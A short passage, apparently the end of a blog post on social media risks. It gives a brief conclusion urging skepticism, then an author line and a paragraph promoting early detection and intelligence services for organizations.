Conclusion

Social networks definitely can be fun, but users should be aware of the risks and behave with the needed level of skepticism, just like anywhere else.



About the Author: Indranath Mitra (Partner, Star Softwares)

I discussed the importance of opening your eyes to the specific risks that the use of social media can present to your organization. Now that you have a better understanding of these risks, what options do you have to better protect your organization against them?
Early detection is imperative for mitigating social media risks. With the help of intelligence services you can improve your organization’s situational awareness to identify and even anticipate certain challenges in order to strengthen your defenses.
